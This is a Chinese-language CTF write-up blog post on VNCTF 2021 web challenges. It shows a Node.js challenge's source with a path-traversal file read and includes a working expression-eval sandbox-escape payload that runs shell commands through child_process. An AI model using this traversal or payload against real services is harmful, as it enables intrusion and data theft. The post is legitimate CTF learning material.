VNCTF2021-Web-Writeup

打完国赛初赛发现自己水平很低,队里面只做出来3个Web,需要提升一下Web水平,稍微做一点题目,从这里开始。

[VNCTF 2021]Ez_game

一个游戏

利用playerData修改玩家数据,利用nextLevel修改下一个关卡为最后一关,利用boss.health修改boss血量为最小,最后缩小网页来看到完整flag

image.png

[VNCTF 2021]naive

先读源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
import express from "express";
import bindings from "bindings";
import { fileURLToPath } from 'url'
import path from "path";

import pkg from 'expression-eval';
const { eval: eval_, parse } = pkg;

const addon = bindings("addon");

const file = fileURLToPath(import.meta.url);

const app = express();
app.use(express.urlencoded({ extended: true }));

app.use(express.static("static"));

app.use("/eval", (req, res) => {
const e = req.body.e;
const code = req.body.code;
if (!e || !code) {
res.send("wrong?");
return;
}
try {
if (addon.verify(code)) {
res.send(String(eval_(parse(e))));
} else {
res.send("wrong?");
}
} catch (e) {
console.log(e)
res.send("wrong?");
}
});

app.use("/source", (req, res) => {
let p = req.query.path || file;
p = path.resolve(path.dirname(file), p);
if (p.includes("flag")) {
res.send("no flag!");
} else {
res.sendFile(p);
}
});

app.use((err, req, res, next) => {
console.log(err)
res.redirect("index.html");
});

app.listen(process.env.PORT || 80);

Node.js写的,存在一个任意文件读取漏洞,存在一个expression-eval,漏洞可能在这两个地方。

先利用读源码的方法来读取一波文件,根据我个人写代码留下的经验,直接猜出文件夹名为/app
,得到一个文件名为/app/package.json

内容如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
{
"name": "name",
"version": "0.1.1",
"description": "Description",
"private": true,
"main": "src/index.js",
"type": "module",
"scripts": {
"start": "node src/index.js",
"build:native": "node-gyp rebuild",
"build:native:dev": "node-gyp rebuild --debug"
},
"dependencies": {
"bindings": "^1.5.0",
"express": "^4.17.1",
"expression-eval": "^4.0.0",
"node-addon-api": "^3.0.2",
"seval": "^2.0.1"
},
"devDependencies": {
"@types/express": "^4.17.8",
"@types/node": "^14.10.1",
"node-gyp": "^7.1.2",
"prettier": "^2.0.5"
}
}

去找一下两个东西:node-addon-apiexpression-eval

对于expression-eval,我们找到一个issue,这里给了一个命令执行的方法;

对于addons,由于verify函数查不到,估计是自己写的,我们使用合适的Payload去读取;path=../build/Release/addon.node,不会逆向,查答案得到是yoshino-s_want_a_gf,qq1735439536(我觉得这个题这个地方出的不行,强行加难度)

然后套用payload尝试去打打

1
e=(1).constructor.constructor('',"return import('child_process').then((m)=>{m.exec('cat /flag > ./static/cat.js')});")()&code=yoshino-s_want_a_gf,qq1735439536

image.png

image.png

[VNCTF 2021]realezjvav(动态靶机)

F12一下发现似乎要用Inturder碰撞密码,那就掏出字典文件试试

撞不出来,可能是SQL注入


VNCTF2021-Web-Writeup
http://hexo.init-new-world.com/VNCTF2021-Web-Writeup
Author
John Doe
Posted on
May 18, 2021
Licensed under